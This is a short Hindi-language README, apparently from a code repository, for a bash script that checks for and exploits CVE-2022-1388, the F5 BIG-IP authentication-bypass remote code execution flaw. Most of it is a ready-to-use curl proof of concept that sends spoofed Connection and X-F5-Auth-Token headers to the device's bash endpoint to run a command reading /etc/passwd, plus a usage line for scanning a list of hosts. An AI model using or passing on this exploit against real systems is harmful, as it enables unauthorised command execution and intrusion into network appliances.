
F5 BIG-IP में CVE-2022-1388 RCE की जाँच और exploit करने के लिए Bash स्क्रिप्ट, कमांड निष्पादन के लिए curl-आधारित POC के साथ।
CVE-2022-1388 RCE (F5 BIG-IP) की जाँच करने के लिए सरल bash स्क्रिप्ट।
[+] उपयोग: ./CVE-2022-1388.sh hosts.txt
IP पता बदलना न भूलें
curl -X POST http://10.0.0.1/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: anything"